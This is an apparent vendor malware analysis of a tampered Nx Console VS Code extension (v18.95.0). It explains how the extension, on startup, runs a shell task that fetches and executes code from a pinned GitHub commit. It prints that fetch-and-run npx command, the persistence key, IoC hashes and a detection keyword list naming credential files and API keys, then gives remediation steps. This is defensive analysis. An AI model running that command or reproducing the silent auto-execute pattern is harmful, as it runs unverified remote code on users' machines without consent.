GitHub Supply Chain Breach: Nx Console 18.95.0 (Analysis)

Bottom line

Agent Mesh detected Nx Console VS Code extension, from the GitHub breach, in the 38 minutes it was live. Here is Agent Mesh’s automated analysis:

A VSIX that publishes itself as nrwl.angular-console v18.95.0 is malicious by mechanism. On first activation it automatically downloads and executes code from a pinned commit of the nrwl/nx GitHub repository, with no user prompt.

The pattern is consistent with the publicly reported Nx / GitHub supply-chain breach and the Shai-Hulud worm campaign.

Classification: Malicious — high confidence, based on source-verified automatic download-and-execute behavior plus strong external corroboration.

Static-analysis scope

This validation was strictly static.

• VSIX downloaded once and extracted with unzip. The compiled main.js was read with text tools only. A cross-bundle sweep across every bundled JS file in the package (the main extension bundle, the Nx Language Server bundle, the webview bundles, and the vendored node_modules) was performed for known IoC strings and for shell-task / npx invocations.
• No code from the VSIX was executed.
• The pinned GitHub commit was not fetched. Its contents are not characterised here.
• No request was made to any attacker infrastructure.
• VirusTotal was consulted as an external corroborating signal. AV labels are recorded as labels, not as proof of behavior.

Basic information

Simple attack flow

1. User installs the VSIX from OpenVSX.
2. VS Code (or Cursor) starts and activates the extension automatically.
3. The extension runs a shell task in the user's workspace: npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2.
4. npx -y auto-accepts prompts and runs whatever the nrwl/nx repository contains at that pinned commit.
5. On success, the extension writes a VS Code globalState key so the task does not run again on this machine.

End result: code from a pinned external git commit runs on the user's machine, with no user prompt and no consent step. What that code does is not characterised in this page.

Confirmed malicious behavior (source-read)

• The extension activates automatically on VS Code / Cursor startup (activationEvents: ["onStartupFinished", "onUri"]).
• Activation unconditionally calls the install function. The install action inside that function is gated only by a VS Code globalState check, not by any user prompt.
• The globalState key is nxConsole.mcpExtensionInstalledSha. If its stored value does not match the hardcoded commit SHA, the install runs.
• The install builds and executes a VS Code shell task with the command npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2.
• The shell task is labeled install-mcp-extension and adds NX_CONSOLE=true to the environment.
• On exit 0, the globalState key is written; the task does not run again on this machine.
• On exit codes 127 or 9009 (typical when npx is missing), no error is logged and the globalState key is not written. The task retries on every later activation until npx is available.
• On any other non-zero exit, an error is logged.

All behavior verified directly in the compiled main.js inside the VSIX.

Confirmed IoCs

Identifiers

• Extension ID (claimed): nrwl.angular-console v18.95.0
• Marketplace (per filename): OpenVSX
• VSIX SHA-256: 1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8

Pinned external dependency

• Repository: github[.]com/nrwl/nx
• Commit (40-char SHA): 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2
• Full git ref used: github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2

Shell execution

• Command: npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2
• VS Code task label: install-mcp-extension
• Environment marker on the spawned shell: NX_CONSOLE=true
• Exit codes silently handled (no error log, no persistence write): 127, 9009

Persistence

• VS Code globalState key: nxConsole.mcpExtensionInstalledSha
• Stored value when gate is set: the commit SHA above

External detection on 21 May, 2026

• VirusTotal: 21 / 66
• Threat categories: trojan, worm, downloader
• Examples of family labels: Worm.Script.ShaiHulud (ALYac), UDS:Worm.Script.Shulud.a (Kaspersky), Worm.Script.Shulud (Ikarus), Trojan.GenericFCA.Script.36960 (BitDefender / Emsisoft / eScan / GData / VIPRE), JS/Agent.UQI (ESET-NOD32), Trojan:JS/Obfuse.BB (Microsoft), JS.DownLoader.10091 (DrWeb)

Evidence boundaries

Each claim below is grouped under the kind of evidence that supports it.

Directly source-verified (from this VSIX)

• The extension's activate() is called automatically on editor startup.
• Activation triggers a shell task that runs npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 in the user's workspace.
• A VS Code globalState gate (nxConsole.mcpExtensionInstalledSha) makes the task run only once per machine on success.
• Exit codes 127 and 9009 are silently handled: no error log is produced and the gate is not set, so the task retries on every later activation.
• The shell task is labeled install-mcp-extension and runs with NX_CONSOLE=true in the environment.
• Cross-bundle bounding: across every bundled JS file in the VSIX (the main extension bundle, the Nx Language Server bundle, the webview bundles, and the vendored node_modules), only the main extension bundle builds a vscode.ShellExecution task, and the npx -y github:nrwl/nx#<SHA> command above is the only npx -y github: invocation in the package.
• Cross-bundle IoC sweep: zero hits across all bundled JS for known supply-chain IoC strings (s1ngularity, shai-hulud / shulud in any case, dangerously-skip-permissions, gh repo create, gh api, AI-CLI-abuse strings, ANTHROPIC_API_KEY / GEMINI_API_KEY / OPENAI_API_KEY / AWS_ACCESS_KEY, trufflehog, octokit, id_rsa / id_ed25519, dotfile-exfil tokens). No second-stage payload is bundled inside the VSIX itself; the second stage lives at the pinned commit only.

Supported by public reporting

• The Nx / GitHub supply-chain breach is publicly reported.
• Compromised versions of nrwl/nx packages have been described in public advisories.
• The Shai-Hulud worm campaign has been described publicly as performing credential theft from developer environments and propagating through developer GitHub accounts.
• The behavior in this VSIX (auto-pull and run code from a pinned nrwl/nx commit) sits in the same ecosystem as the publicly reported breach.

Supported by AV / VirusTotal - 21 May, 2026

• VirusTotal returns 21 / 66 detections on this exact file (SHA-256 above).
• Several major vendors apply Shai-Hulud / Shulud family labels. These are campaign-specific, not generic heuristics.
• VirusTotal Code Insights separately describes this file as "a tampered version of the legitimate Nx Console extension" and names the same install-on-activation chain that source review found.

Not directly verified in this validation

• The contents of the pinned git commit 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2. The commit was not fetched.
• Specific second-stage payload behavior on the user's machine.
• That credential theft has occurred from any specific installation of this exact sample.
• That worm propagation has occurred from any specific installation of this exact sample.
• Whether the legitimate, untampered Nx Console binary contains the same install-on-activation mechanism with a different SHA value. No direct comparison with the official nrwl/nx-console source was performed.
• Current marketplace status (removal, install count over time, publisher verification state). The OpenVSX listing was not queried in this validation.

If any of these matter for downstream action, they should be confirmed in a separate validation step.

Risk and impact

• The VSIX itself is malicious by mechanism: it executes a remote-fetch shell command on activation, without consent, gated by a one-time persistence key.
• Whether the second-stage code actually runs on a given machine depends on npx being available at activation. With npx installed, the download succeeds and the gate is set after the first run. Without npx (exit 127 or 9009), the second stage does not execute, but the dropper retries on every later activation until conditions allow execution.
• Multiple AV vendors associate the file with the Shai-Hulud worm family. Second-stage behavior is not separately verified here, but it is consistent with the publicly reported campaign.

Recommended user actions

1. Uninstall any nrwl.angular-console extension installed from OpenVSX.
2. Check the VS Code globalState for the key nxConsole.mcpExtensionInstalledSha. Its presence indicates the install task ran at least once on this machine.
3. As a precaution — consistent with publicly reported defensive guidance for the Shai-Hulud / Nx campaign, not based on second-stage behavior verified here — treat any machine that activated this extension with npx available as having executed unverified remote code. Rotate tokens that were present in the shell environment, review unexpected GitHub repositories and SSH keys, and check for modifications to ~/.npmrc, ~/.bashrc, ~/.zshrc, and ~/.bash_profile.
4. If using the legitimate Nx Console, install from the VS Code Marketplace, verify the publisher field shows nrwl, and verify the version against github.com/nrwl/nx-console/releases.

Notes

• Attribution to the Shai-Hulud worm family comes from AV vendor labels and public reporting. It is not source-verified from the pinned commit (which was not fetched).
• The task label install-mcp-extension may resemble a legitimate companion-install feature. The use of a pinned full-repository git commit (instead of a published npm package) is the unusual part, and it is what the AV signatures match on.
• This page contains no internal-only references and is safe for broader sharing.

.